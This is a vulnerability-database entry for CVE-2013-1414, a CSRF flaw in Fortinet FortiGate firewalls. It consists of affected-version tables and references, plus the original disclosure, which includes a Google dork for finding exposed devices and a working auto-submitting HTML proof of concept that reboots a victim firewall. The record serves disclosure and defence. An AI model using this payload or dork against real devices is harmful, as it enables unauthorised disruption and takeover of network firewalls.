ID
VAR-E-201306-0228
CVE
| cve_id: | CVE-2013-1414 | Trust: 2.4 |
EDB ID
26528
TITLE
Fortigate Firewalls - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Fortigate Firewalls - Cross-Site Request Forgery. CVE-2013-1414CVE-94724 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | fortigate | model: | firewalls | scope: | - | version: | - | Trust: 1.6 |
| vendor: | fortigate | model: | firewall | scope: | - | version: | - | Trust: 0.5 |
| vendor: | fortinet | model: | fortios | scope: | eq | version: | 5.0.2 | Trust: 0.3 |
| vendor: | fortinet | model: | fortios | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
| vendor: | fortinet | model: | fortios b0630 | scope: | eq | version: | 4.3.8 | Trust: 0.3 |
| vendor: | fortinet | model: | fortios b0537 | scope: | eq | version: | 4.3.8 | Trust: 0.3 |
| vendor: | fortinet | model: | fortios | scope: | eq | version: | 4.3.8 | Trust: 0.3 |
| vendor: | fortinet | model: | fortios b064 | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | fortinet | model: | fortios | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate-60c | scope: | eq | version: | 4.0 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate-100d | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate-1000 | scope: | eq | version: | 3.00 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 4.3.6 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 4.3.5 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 800f | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 800 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 620b | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 60m | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 60 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 50am | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 50a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 500a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 5000 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 500 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 400a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 4000 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 400 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 3950 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 3810a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 3600a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 3600 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 311b | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 310b | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 3016b | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 300a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 3000 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 300 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 3.00 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 224b | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 200b | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 200a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 200 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 1240b | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 100a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 1000afa2 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate 1000a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 1000 | Trust: 0.3 |
| vendor: | fortinet | model: | fortigate | scope: | eq | version: | 100 | Trust: 0.3 |
| vendor: | fortinet | model: | fortios | scope: | ne | version: | 5.0.3 | Trust: 0.3 |
| vendor: | fortinet | model: | fortios | scope: | ne | version: | 4.3.13 | Trust: 0.3 |
EXPLOIT
Vulnerability ID: CVE-2013-1414
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Product: All Fortigate Firewalls
Vendor: Fortinet http://www.fortinet.com
Vulnerable Version: < 4.3.13 & < 5.0.2
Description
==========
Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall.
Requirements
===========
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.
Report-Timeline:
================
Vendor Notification: 11 July 2012
Vendor released version 5.0.2 / 18 March 2013
Vendor released version 4.3.13 / 29 April 2013
Status: Fixed
Google Dork:
==========
-english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"
Credit:
=====
Sven Wurth dos@net-war.de
PoC
====
This Example will reboot a Fortinet Firewall.
This is just one of many possibilities to attack this vulnerability.
##### CSRF - Proof Of Concept ####
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post">
<input type="hidden" name="reason" value="">
<input type="hidden" name="action" value="1">
<input type="submit" name="add" value="rebootme">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
##### End Poc #####
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.0
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | vulnerability | Trust: 0.5 |
| tag: | csrf | Trust: 0.5 |
CREDITS
Sven Wurth
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-1414 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 26528 | Trust: 1.6 |
| db: | EDBNET | id: | 48498 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 122216 | Trust: 0.5 |
| db: | BID | id: | 60861 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-1414 | Trust: 2.1 |
| url: | https://www.exploit-db.com/exploits/26528/ | Trust: 0.6 |
| url: | https://www.fortinet.com/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 60861 |
| db: | PACKETSTORM | id: | 122216 |
| db: | EXPLOIT-DB | id: | 26528 |
| db: | EDBNET | id: | 48498 |
LAST UPDATE DATE
2022-07-27T09:45:14.670000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 60861 | date: | 2013-06-28T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 60861 | date: | 2013-06-28T00:00:00 |
| db: | PACKETSTORM | id: | 122216 | date: | 2013-06-28T22:13:39 |
| db: | EXPLOIT-DB | id: | 26528 | date: | 2013-07-01T00:00:00 |
| db: | EDBNET | id: | 48498 | date: | 2013-07-01T00:00:00 |